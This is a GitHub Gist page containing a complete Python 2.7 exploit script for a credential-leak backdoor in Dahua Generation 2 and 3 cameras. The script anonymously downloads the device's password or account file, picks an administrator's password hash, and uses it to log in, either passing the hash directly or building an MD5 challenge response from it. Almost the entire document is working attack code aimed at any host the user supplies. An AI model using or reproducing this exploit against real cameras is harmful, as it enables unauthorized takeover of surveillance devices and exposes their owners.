-
-
Save interfacekun/06d9b195d5c1a122a7cfdd52eff5fd96 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2.7 | |
# | |
# Dahua backdoor Generation 2 and 3 | |
# Author: bashis <mcw noemail eu> March 2017 | |
# | |
# Credentials: No credentials needed (Anonymous) | |
#Jacked from git history | |
# | |
import string | |
import sys | |
import socket | |
import argparse | |
import urllib, urllib2, httplib | |
import base64 | |
import ssl | |
import json | |
import commentjson # pip install commentjson | |
import hashlib | |
class HTTPconnect: | |
def __init__(self, host, proto, verbose, creds, Raw, noexploit): | |
self.host = host | |
self.proto = proto | |
self.verbose = verbose | |
self.credentials = creds | |
self.Raw = Raw | |
self.noexploit = False | |
self.noexploit = noexploit | |
def Send(self, uri, query_headers, query_data,ID): | |
self.uri = uri | |
self.query_headers = query_headers | |
self.query_data = query_data | |
self.ID = ID | |
# Connect-timeout in seconds | |
timeout = 5 | |
socket.setdefaulttimeout(timeout) | |
url = '%s://%s%s' % (self.proto, self.host, self.uri) | |
if self.verbose: | |
print "[Verbose] Sending:", url | |
if self.proto == 'https': | |
if hasattr(ssl, '_create_unverified_context'): | |
print "[i] Creating SSL Unverified Context" | |
ssl._create_default_https_context = ssl._create_unverified_context | |
if self.credentials: | |
Basic_Auth = self.credentials.split(':') | |
if self.verbose: | |
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] | |
try: | |
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() | |
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) | |
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) | |
opener = urllib2.build_opener(auth_handler) | |
urllib2.install_opener(opener) | |
except Exception as e: | |
print "[!] Basic Auth Error:",e | |
sys.exit(1) | |
if self.noexploit and not self.verbose: | |
print "[<] 204 Not Sending!" | |
html = "Not sending any data" | |
else: | |
if self.query_data: | |
req = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers) | |
if self.ID: | |
req.add_header('DhWebClientSessionID',self.ID) | |
else: | |
req = urllib2.Request(url, None, headers=self.query_headers) | |
if self.ID: | |
req.add_header('DhWebClientSessionID',self.ID) | |
rsp = urllib2.urlopen(req) | |
# print rsp | |
if rsp: | |
print "[<] %s OK" % rsp.code | |
if self.Raw: | |
return rsp | |
else: | |
html = rsp.read() | |
return html | |
class Dahua_Backdoor: | |
def __init__(self, rhost, proto, verbose, creds, Raw, noexploit): | |
self.rhost = rhost | |
self.proto = proto | |
self.verbose = verbose | |
self.credentials = creds | |
self.Raw = Raw | |
self.noexploit = False | |
self.noexploit = noexploit | |
# Generation 2 | |
def Gen2(self,response,headers): | |
self.response = response | |
self.headers = headers | |
html = self.response.readlines() | |
for line in html: | |
if line[0] == "#" or line[0] == "\n": | |
continue | |
line = line.split(':')[0:25] | |
if line[1] == 'admin': | |
print "[i] Chosing Admin Login: {}, PWD hash: {}".format(line[1],line[2]) | |
ADMIN = line[1] | |
PWD = line[2] | |
break | |
elif line[1] == '888888': | |
print "[i] Choosing Admin Login: {}, PWD hash: {}".format(line[1],line[2]) | |
ADMIN = line[1] | |
PWD = line[2] | |
break | |
else: | |
if line[3] == '1': | |
print "Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2]) | |
ADMIN = line[1] | |
PWD = line[2] | |
break | |
# | |
# Login 1 | |
# | |
print "[>] Requesting our session ID" | |
query_args = {"method":"global.login", | |
"params":{ | |
"userName":ADMIN, | |
"password":"", | |
"clientType":"Web3.0"}, | |
"id":10000} | |
URI = '/RPC2_Login' | |
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) | |
json_obj = json.load(response) | |
if self.verbose: | |
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': ')) | |
# | |
# Login 2 | |
# | |
print "[>] Logging in" | |
query_args = {"method":"global.login", | |
"session":json_obj['session'], | |
"params":{ | |
"userName":ADMIN, | |
"password":PWD, | |
"clientType":"Web3.0", | |
"authorityType":"OldDigest"}, | |
"id":10000} | |
URI = '/RPC2_Login' | |
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,json_obj['session']) | |
print response.read() | |
# | |
# Wrong username/password | |
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1997483520 } | |
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1997734656 } | |
# | |
# Successfull login | |
# { "id" : 10000, "params" : null, "result" : true, "session" : 1626533888 } | |
# | |
# | |
# Logout | |
# | |
print "[>] Logging out" | |
query_args = {"method":"global.logout", | |
"params":"null", | |
"session":json_obj['session'], | |
"id":10001} | |
URI = '/RPC2' | |
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) | |
return response | |
# Generation 3 | |
def Gen3(self,response,headers): | |
self.response = response | |
self.headers = headers | |
json_obj = commentjson.load(self.response) | |
if self.verbose: | |
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': ')) | |
for who in json_obj[json_obj.keys()[0]]: | |
if who['Group'] == 'admin': | |
USER_NAME = who['Name'] | |
PWDDB_HASH = who['Password'] | |
AUTH_NO = len(who['AuthorityList']) | |
if AUTH_NO >= 20: | |
print "[i] Choosing Admin Login: {}, Auth: {}".format(who['Name'],len(who['AuthorityList'])) | |
break | |
# | |
# Request login | |
# | |
print "[>] Requesting our session ID" | |
query_args = {"method":"global.login", | |
"params":{ | |
"userName":USER_NAME, | |
"password":"", | |
"clientType":"Web3.0"}, | |
"id":10000} | |
URI = '/RPC2_Login' | |
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) | |
json_obj = json.load(response) | |
if self.verbose: | |
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': ')) | |
RANDOM = json_obj['params']['random'] | |
PASS = ''+ USER_NAME +':' + RANDOM + ':' + PWDDB_HASH + '' | |
RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper() | |
print "[i] Downloaded MD5 hash:",PWDDB_HASH | |
print "[i] Random value to encrypt with:",RANDOM | |
print "[i] Built password:",PASS | |
print "[i] MD5 generated password:",RANDOM_HASH | |
# | |
# Login | |
# | |
print "[>] Logging in" | |
query_args = {"method":"global.login", | |
"session":json_obj['session'], | |
"params":{ | |
"userName":USER_NAME, | |
"password":RANDOM_HASH, | |
"clientType":"Web3.0", | |
"authorityType":"Default"}, | |
"id":10000} | |
URI = '/RPC2_Login' | |
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,json_obj['session']) | |
print response.read() | |
# Wrong username/password | |
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1156538295 } | |
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1175812023 } | |
# | |
# Successfull login | |
# { "id" : 10000, "params" : null, "result" : true, "session" : 1175746743 } | |
# | |
# | |
# Logout | |
# | |
print "[>] Logging out" | |
query_args = {"method":"global.logout", | |
"params":"null", | |
"session":json_obj['session'], | |
"id":10001} | |
URI = '/RPC2' | |
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) | |
return response | |
# | |
# Validate correctness of HOST, IP and PORT | |
# | |
class Validate: | |
def __init__(self,verbose): | |
self.verbose = verbose | |
# Check if IP is valid | |
def CheckIP(self,IP): | |
self.IP = IP | |
ip = self.IP.split('.') | |
if len(ip) != 4: | |
return False | |
for tmp in ip: | |
if not tmp.isdigit(): | |
return False | |
i = int(tmp) | |
if i < 0 or i > 255: | |
return False | |
return True | |
# Check if PORT is valid | |
def Port(self,PORT): | |
self.PORT = PORT | |
if int(self.PORT) < 1 or int(self.PORT) > 65535: | |
return False | |
else: | |
return True | |
# Check if HOST is valid | |
def Host(self,HOST): | |
self.HOST = HOST | |
try: | |
# Check valid IP | |
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP | |
# Now we check if it is correct typed IP | |
if self.CheckIP(self.HOST): | |
return self.HOST | |
else: | |
return False | |
except socket.error as e: | |
# Else check valid DNS name, and use the IP address | |
try: | |
self.HOST = socket.gethostbyname(self.HOST) | |
return self.HOST | |
except socket.error as e: | |
return False | |
if __name__ == '__main__': | |
# | |
# Help, info and pre-defined values | |
# | |
INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]\n' | |
HTTP = "http" | |
HTTPS = "https" | |
proto = HTTP | |
verbose = False | |
noexploit = False | |
raw_request = True | |
rhost = '192.168.5.2' # Default Remote HOST | |
rport = '80' # Default Remote PORT | |
# creds = 'root:pass' | |
creds = False | |
# | |
# Try to parse all arguments | |
# | |
try: | |
arg_parser = argparse.ArgumentParser( | |
prog=sys.argv[0], | |
description=('[*] '+ INFO +' [*]')) | |
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') | |
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') | |
if creds: | |
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') | |
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') | |
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') | |
arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') | |
args = arg_parser.parse_args() | |
except Exception as e: | |
print INFO,"\nError: %s\n" % str(e) | |
sys.exit(1) | |
# We want at least one argument, so print out help | |
if len(sys.argv) == 1: | |
arg_parser.parse_args(['-h']) | |
print "\n[*]",INFO | |
if args.verbose: | |
verbose = args.verbose | |
# | |
# Check validity, update if needed, of provided options | |
# | |
if args.https: | |
proto = HTTPS | |
if not args.rport: | |
rport = '443' | |
if creds and args.auth: | |
creds = args.auth | |
if args.noexploit: | |
noexploit = args.noexploit | |
if args.rport: | |
rport = args.rport | |
if args.rhost: | |
rhost = args.rhost | |
# Check if RPORT is valid | |
if not Validate(verbose).Port(rport): | |
print "[!] Invalid RPORT - Choose between 1 and 65535" | |
sys.exit(1) | |
# Check if RHOST is valid IP or FQDN, get IP back | |
rhost = Validate(verbose).Host(rhost) | |
if not rhost: | |
print "[!] Invalid RHOST" | |
sys.exit(1) | |
# | |
# Validation done, start print out stuff to the user | |
# | |
if noexploit: | |
print "[i] Test mode selected, no exploiting..." | |
if args.https: | |
print "[i] HTTPS / SSL Mode Selected" | |
print "[i] Remote target IP:",rhost | |
print "[i] Remote target PORT:",rport | |
# print "[i] Connect back IP:",lhost | |
# print "[i] Connect back PORT:",lport | |
rhost = rhost + ':' + rport | |
headers = { | |
'Connection': 'close', | |
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8', | |
'Accept' : '*/*', | |
'X-Requested-With' : 'XMLHttpRequest', | |
'X-Request' : 'JSON', | |
'User-Agent':'Mozilla/5.0', | |
} | |
try: | |
print "[>] Checking for backdoor version" | |
URI = "/current_config/passwd" | |
response = HTTPconnect(rhost,proto,verbose,creds,raw_request,noexploit).Send(URI,headers,None,None) | |
print "[!] Generation 2 found" | |
reponse = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request,noexploit).Gen2(response,headers) | |
except urllib2.HTTPError as e: | |
if e.code == 404: | |
try: | |
URI = '/current_config/Account1' | |
response = HTTPconnect(rhost,proto,verbose,creds,raw_request,noexploit).Send(URI,headers,None,None) | |
print "[!] Generation 3 Found" | |
response = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request,noexploit).Gen3(response,headers) | |
except urllib2.HTTPError as e: | |
if e.code == 404: | |
print "[!] Seems not to be Dahua device! ({})".format(e.code) | |
sys.exit(1) | |
else: | |
print "Error Code: {}".format(e.code) | |
except Exception as e: | |
print "[!] Detect of target failed (%s)" % e | |
sys.exit(1) | |
print "\n[*] All done...\n" | |
sys.exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment